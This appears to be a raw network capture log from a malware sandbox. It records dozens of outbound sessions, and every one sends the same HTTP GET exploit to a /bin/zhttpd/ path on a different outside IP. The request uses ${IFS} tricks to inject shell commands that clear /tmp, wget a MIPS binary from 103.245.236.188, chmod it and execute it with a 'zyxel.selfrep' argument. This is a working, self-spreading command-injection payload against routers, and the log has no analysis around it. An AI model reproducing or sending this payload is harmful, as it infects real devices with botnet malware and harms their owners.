                                    Jan 13, 2024 19:02:19.857405901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    952192.168.2.1344844168.150.43.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.857484102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    953192.168.2.135490613.8.152.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858095884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    954192.168.2.133866270.162.184.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858120918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    955192.168.2.1334842222.186.164.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858144045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    956192.168.2.1354848165.105.62.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858213902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    957192.168.2.135090242.148.129.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858226061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    958192.168.2.1355410150.62.65.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858258963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    959192.168.2.133943023.138.66.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858305931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    960192.168.2.134651427.170.251.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858354092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    961192.168.2.1337308166.157.197.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858378887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    962192.168.2.1349682223.16.122.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858406067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    963192.168.2.133879064.105.247.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858474016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    964192.168.2.1343150221.57.45.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858496904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    965192.168.2.1343294212.152.255.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858526945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    966192.168.2.1351194155.5.235.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858578920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    967192.168.2.1340290169.73.126.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858597994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    968192.168.2.1347688176.177.103.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858649015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    969192.168.2.1341002201.88.235.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858680964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    970192.168.2.1351666213.3.9.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858737946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    971192.168.2.133309073.175.79.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858769894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    972192.168.2.133374446.25.117.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858799934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    973192.168.2.1359996186.35.172.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:19.858819962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    974192.168.2.1360470103.85.18.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.853677034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    975192.168.2.1333792122.131.151.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.853780985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    976192.168.2.1358380183.138.31.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.853809118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    977192.168.2.1346378155.100.179.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.853848934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    978192.168.2.1337072142.203.47.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.853892088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    979192.168.2.1346228223.55.215.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.853919029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    980192.168.2.135746843.156.22.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.853962898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    981192.168.2.13375284.15.31.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.853998899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    982192.168.2.1345334191.232.147.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854028940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    983192.168.2.133921845.2.1.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854077101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    984192.168.2.135782449.58.130.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854120016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    985192.168.2.1359572148.255.239.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854144096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    986192.168.2.133843861.4.181.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854181051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    987192.168.2.133486831.44.48.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854199886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    988192.168.2.135091257.51.176.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854262114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    989192.168.2.1350700191.114.31.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854310036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    990192.168.2.1347590102.247.142.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854336023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    991192.168.2.1357556213.155.197.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854377031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    992192.168.2.1359264167.136.79.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854412079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    993192.168.2.135791463.221.89.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854465008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    994192.168.2.1359488154.254.43.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854490995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    995192.168.2.133566458.104.133.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854548931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    996192.168.2.135026647.151.191.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854583025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    997192.168.2.1337198128.215.243.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854619026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    998192.168.2.1342544124.57.11.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854674101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    999192.168.2.1333060180.62.75.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854703903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1000192.168.2.1341948122.34.82.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854748011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1001192.168.2.1339418140.132.79.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854792118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1002192.168.2.1337132209.86.226.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854829073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1003192.168.2.134119880.71.137.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854865074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1004192.168.2.1334202120.144.203.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854887009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1005192.168.2.1344906155.143.27.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854919910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1006192.168.2.133999418.47.18.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854944944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1007192.168.2.1334258119.247.81.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.854981899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1008192.168.2.1352194142.123.44.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855021000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1009192.168.2.134774824.130.222.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855067968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1010192.168.2.1336134104.38.21.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855107069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1011192.168.2.135425469.98.191.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855154037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1012192.168.2.1333452112.110.49.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855178118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1013192.168.2.133340885.50.8.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855214119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1014192.168.2.133999049.66.133.237443
                                    TimestampBytes transferredDirectionData
